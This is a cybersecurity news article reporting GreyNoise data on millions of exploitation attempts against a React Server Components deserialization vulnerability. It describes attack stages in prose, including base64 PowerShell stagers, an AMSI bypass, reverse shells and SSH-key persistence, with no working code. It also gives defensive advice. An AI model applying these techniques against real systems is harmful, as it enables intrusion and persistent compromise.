By rssfeeds-admin Security monitoring firm GreyNoise reported on January 7, 2026, that the vulnerability has been exploited in over 8.1 million attack sessions since its initial disclosure, with attackers showing no signs of slowing their assault on unprepared organizations.
The campaign’s scale has reached unprecedented levels. Daily exploitation volumes have stabilized between 300,000 and 400,000 attack sessions, following a December peak of more than 430,000 daily attempts.
This sustained attack rate underscores the severity of the vulnerability and its appeal to threat actors operating across diverse geographic regions and network infrastructures.
GreyNoise’s telemetry identified 8,163 unique source IP addresses spanning 1,071 autonomous systems across 101 countries, demonstrating the borderless nature of the exploitation wave.
Infrastructure analysis reveals a heavy reliance on cloud providers, with Amazon Web Services accounting for more than one-third of observed exploitation traffic.
This concentration among legitimate cloud platforms highlights attackers’ strategy of leveraging compromised or rented infrastructure to scale their attacks.
Notably, nearly 50% of exploitation IPs were first observed by GreyNoise in December 2025, indicating rapid churn through VPS and proxy pools a hallmark of large-scale, automated campaigns.
Threat actors are employing relatively standard exploitation techniques despite the vulnerability’s critical nature.
Attack chains begin with proof-of-execution (PoE) validation using PowerShell arithmetic commands, followed by base64-encoded PowerShell stagers that download additional payloads.
Stage-two payloads leverage AMSI (Antimalware Scan Interface) bypass techniques through reflection-based manipulation of System.Management.Automation.AmsiUtils, a well-documented evasion method widely available in commodity toolkits.
The attack arsenal comprises 70,000+ unique payloads, with attack patterns spanning system reconnaissance, reverse-shell deployment, SSH key installation for persistence, and cryptomining operations.
Network fingerprinting analysis identified 700 unique JA4H hashes and 340 unique JA4T hashes, indicating diverse tooling and bot variants driving the campaign.
GreyNoise’s analysis confirms the exploitation infrastructure is overwhelmingly automation-driven, dominated by Go HTTP clients and scanner-tagged user agents.
However, the simplicity of exploitation techniques masks the sophistication of the infrastructure supporting this campaign.
Defenders lacking patches face a continuous siege, with nearly instantaneous discovery and exploitation attempts targeting vulnerable React Server Component deployments.
Organizations running unpatched React or Next.js instances face an immediate risk of compromise. Security teams are urged to prioritize patching, implement dynamic IP blocking using updated threat feeds, and deploy endpoint detection focused on PowerShell execution patterns and AMSI-bypass indicators.
| CVE ID | Vulnerability Name | Affected Components | CVSS Score | Exploitation Status | Attack Vector |
|---|---|---|---|---|---|
| CVE-2025-55182 | React Server Components (RSC) Flight Protocol Unsafe Deserialization RCE | React, Next.js, downstream RSC implementations | 9.8 (Critical) | Active, 8.1M+ sessions |
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyber Press as a Preferred Source in Google.
The post Hackers Launch 8.1 Million Attack Sessions Exploiting React2Shell Vulnerability appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.